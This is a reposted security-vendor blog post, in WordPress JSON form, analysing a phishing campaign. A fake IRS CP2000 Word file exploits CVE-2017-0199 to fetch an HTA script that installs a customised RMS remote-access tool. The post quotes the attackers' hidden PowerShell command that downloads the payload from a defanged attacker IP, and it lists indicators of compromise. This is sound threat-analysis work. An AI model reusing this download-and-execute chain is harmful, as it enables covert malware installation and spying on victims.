{"id":9439,"date":"2017-09-21T08:10:16","date_gmt":"2017-09-21T16:10:16","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/21\/news-3212\/"},"modified":"2017-09-21T08:10:16","modified_gmt":"2017-09-21T16:10:16","slug":"news-3212","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/09\/21\/news-3212\/","title":{"rendered":"Fake IRS notice delivers customized spying tool"},"content":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Thu, 21 Sep 2017 15:00:24 +0000<\/strong><\/p>\n<p>While macro-based documents and scripts make up for the majority of malspam attacks these days, we also see some campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious Microsoft Office file disguised as a <a href=\"https:\/\/www.irs.gov\/individuals\/understanding-your-cp2000-notice\" target=\"_blank\" rel=\"noopener\">CP2000 notice<\/a>. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when\u00a0information is incorrectly reported on a previous return.<\/p>\n<p>Victims that fall for the scam will infect themselves with a custom\u00a0Remote Administration Tool. A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user&#8217;s consent or knowledge to remotely control their machine, view and delete files or deploy a keylogger to silently capture keystrokes.<\/p>\n<p>In this blog post, we will review this exploit&#8217;s delivery mechanism and take a look at the remote tool it deploys.<\/p>\n<h3>Distribution<\/h3>\n<p>The malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email.\u00a0The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, it downloads the final payload, all with very little user interaction required since it is using <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-0199\" target=\"_blank\" rel=\"noopener\">CVE-2017-0199<\/a>,\u00a0first <a href=\"https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/04\/cve-2017-0199-hta-handler.html\" target=\"_blank\" rel=\"noopener\">uncovered<\/a> in April 2017 as a zero-day.<\/p>\n<pre>82.211.30[.]108\/css\/<strong>CP2000IRS.doc<\/strong>  <a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/doc_HTA.png\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19772\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/doc_HTA.png\" alt=\"\" width=\"902\" height=\"443\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/doc_HTA.png 902w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/doc_HTA-300x147.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/doc_HTA-600x295.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/doc_HTA-900x443.png 900w\" sizes=\"auto, (max-width: 902px) 100vw, 902px\" \/><\/a><\/pre>\n<p>The embedded link points to an HTA script hosted under an unexpected location &#8211; a Norwegian company&#8217;s\u00a0compromised FTP server &#8211; which invokes PowerShell to download and execute the actual malware payload.<\/p>\n<pre>ftp:\/\/lindrupmartinsen[.]no:21\/httpdocs\/test\/template.hta  <a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/HTA_fragment.png\" target=\"_blank\" rel=\"noopener\" data-rel=\"lightbox-1\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19774\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/HTA_fragment.png\" alt=\"\" width=\"695\" height=\"478\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/HTA_fragment.png 695w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/HTA_fragment-300x206.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/HTA_fragment-600x413.png 600w\" sizes=\"auto, (max-width: 695px) 100vw, 695px\" \/><\/a>  \"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe\"   -WindowStyle Hidden (New-Object System.Net.WebClient)  .DownloadFile('http:\/\/82.211.30[.]108\/css\/intelgfx.exe',  'C:Users[username]AppDataRoaming62962.exe');<\/pre>\n<h3>Payload<\/h3>\n<p>The downloaded payload (<em>intelgfx.exe<\/em>) extracts to several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to remain invisible to the victim.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/RAT_deployment.png\" data-rel=\"lightbox-2\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19777\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/RAT_deployment.png\" alt=\"\" width=\"802\" height=\"912\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/RAT_deployment.png 802w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/RAT_deployment-264x300.png 264w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/RAT_deployment-528x600.png 528w\" sizes=\"auto, (max-width: 802px) 100vw, 802px\" \/><\/a><\/p>\n<p>RMS agent stands for <a href=\"https:\/\/ru.wikipedia.org\/wiki\/Remote_Manipulator_System\" target=\"_blank\" rel=\"noopener\">Remote Manipulator System<\/a> and is a remote control application made by a Russian company. It appears that in this case, the attackers took the original program (as pictured below) and slightly customized it, not to mention the fact that they are using it for nefarious purposes, namely spying on their victims.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19783\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/gui_looks_thumb.png\" alt=\"\" width=\"296\" height=\"232\" \/><\/p>\n<p>Its source code shows the debugging path information and name that they gave to the module.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/PDB.png\" data-rel=\"lightbox-3\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19778\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/PDB.png\" alt=\"\" width=\"1058\" height=\"523\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/PDB.png 1058w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/PDB-300x148.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/PDB-600x297.png 600w\" sizes=\"auto, (max-width: 1058px) 100vw, 1058px\" \/><\/a><\/p>\n<h3>Office exploits and RATs<\/h3>\n<p>This is not the first time that CVE-2017-0199 is used to distribute a RAT. Last August, TrendMicro <a href=\"http:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/cve-2017-0199-new-malware-abuses-powerpoint-slide-show\/\" target=\"_blank\" rel=\"noopener\">described<\/a> an attack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits &#8211; which can be legitimate &#8211; and turn them into full-fledged spying applications.<\/p>\n<p>We reported the compromised FTP server to its owner.\u00a0<a href=\"https:\/\/www.malwarebytes.com\/\" target=\"_blank\" rel=\"noopener\">Malwarebytes<\/a> users were already protected against CVE-2017-0199 as well as its payload which is detected as <em>Backdoor.Bot<\/em>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19779\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/block.png\" alt=\"\" width=\"815\" height=\"575\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/block.png 815w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/block-300x212.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/block-600x423.png 600w\" sizes=\"auto, (max-width: 815px) 100vw, 815px\" \/><\/p>\n<p><em>Thanks to <a href=\"https:\/\/twitter.com\/hasherezade\" target=\"_blank\" rel=\"noopener\">@hasherezade<\/a> for help with payload analysis.<\/em><\/p>\n<h3>Indicators of compromise<\/h3>\n<p><strong>Word doc CVE-2017-0199<\/strong><\/p>\n<pre>82.211.30[.]108\/css\/CP2000IRS.doc  47ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1<\/pre>\n<p><strong>HTA script<\/strong><\/p>\n<pre>ftp:\/\/lindrupmartinsen[.]no:21\/httpdocs\/test\/template.hta  d01b6d9507429df065b9b823e763a043aa38b722419d35f29a587c893b3008a5<\/pre>\n<p><strong>Main package (intelgfx.exe)<\/strong><\/p>\n<pre>82.211.30[.]108\/css\/intelgfx.exe  924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8<\/pre>\n<p><strong>RAT module<\/strong><\/p>\n<pre>4d0e5ebb4d64adc651608ff4ce335e86631b0d93392fe1e701007ae6187b7186<\/pre>\n<p><strong>Other IOCs from same distribution server<\/strong><\/p>\n<pre>82.211.30[.]108\/estate.xml  82.211.30[.]108\/css\/qbks.exe<\/pre>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/09\/cve-2017-0199-used-to-deliver-modified-rms-agent-rat\/\">Fake IRS notice delivers customized spying tool<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/09\/cve-2017-0199-used-to-deliver-modified-rms-agent-rat\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Thu, 21 Sep 2017 15:00:24 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/09\/cve-2017-0199-used-to-deliver-modified-rms-agent-rat\/' title='Fake IRS notice delivers customized spying tool'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/09\/Untitled-design-2.png' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>Threat actors leverage a Microsoft Office exploit to spy on their victims. In this blog post, we will review its delivery mechanism and analyze the malware we observed, a modified version of a commercial Remote Administration Tool (RAT).<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/malware-threat-analysis\/\" rel=\"category tag\">Malware<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/cp2000\/\" rel=\"tag\">CP2000<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/cve-2017-0199\/\" rel=\"tag\">CVE-2017-0199<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/doc\/\" rel=\"tag\">doc<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/exploit\/\" rel=\"tag\">exploit<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/irs\/\" rel=\"tag\">IRS<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/malspam\/\" rel=\"tag\">malspam<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/malware\/\" rel=\"tag\">malware<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/office\/\" rel=\"tag\">Office<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/phishing\/\" rel=\"tag\">phishing<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/rat\/\" rel=\"tag\">rat<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/remote-administration-tool\/\" rel=\"tag\">remote administration tool<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/rms\/\" rel=\"tag\">RMS<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/spy\/\" rel=\"tag\">spy<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/word\/\" rel=\"tag\">word<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/09\/cve-2017-0199-used-to-deliver-modified-rms-agent-rat\/' title='Fake IRS notice delivers customized spying tool'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/09\/cve-2017-0199-used-to-deliver-modified-rms-agent-rat\/\">Fake IRS notice delivers customized spying tool<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[14997,11992,14998,11638,11187,11928,3764,3245,3924,1810,11876,14999,15000,10494,10882],"class_list":["post-9439","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-cp2000","tag-cve-2017-0199","tag-doc","tag-exploit","tag-irs","tag-malspam","tag-malware","tag-office","tag-phishing","tag-rat","tag-remote-administration-tool","tag-rms","tag-spy","tag-threat-analysis","tag-word"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9439","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9439"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9439\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9439"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9439"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9439"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}